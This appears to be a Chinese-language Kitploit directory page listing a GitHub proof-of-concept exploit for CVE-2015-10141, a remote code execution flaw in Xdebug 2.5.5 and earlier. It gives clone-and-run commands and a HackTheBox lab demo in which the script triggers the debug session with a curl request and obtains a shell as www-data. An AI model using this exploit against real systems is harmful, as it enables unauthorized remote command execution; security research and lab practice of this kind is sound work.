Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2015-10141-Xdebug — 针对 Xdebug 2.5.5 及更早版本的概念验证(PoC)漏洞利用脚本(CVE-2015-10141)。 | Kitploit
工具/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

针对 Xdebug 2.5.5 及更早版本的概念验证(PoC)漏洞利用脚本(CVE-2015-10141)。

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PoC-CVE-2015-10141

针对 Xdebug ≤ 2.5.5(CVE-2015-10141)的自定义 Python 漏洞利用程序。


描述

本仓库包含我针对 Xdebug 远程代码执行漏洞(版本 2.5.5 及更早版本)的概念验证(PoC)漏洞利用程序。
该脚本利用端口 9000 上暴露的未授权调试协议来实现远程命令执行。

  • 漏洞:CVE-2015-10141
  • 漏洞类型:远程代码执行(RCE)
  • 受影响软件:Xdebug ≤ 2.5.5

使用方法

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

出现提示时,输入托管 Xdebug 的目标 IP 地址。

来自我最近的 HackTheBox Olympus(中等难度)报告的演示:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

环境要求

  • Python 3.x
  • 目标系统运行 Xdebug ≤ 2.5.5 并已启用远程调试

免责声明

本项目仅用于教育目的。

请勿在未经明确授权的情况下将此漏洞利用程序用于任何系统。对于该代码的任何滥用行为,我概不负责。


参考

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Xdebug 官方网站
下载工具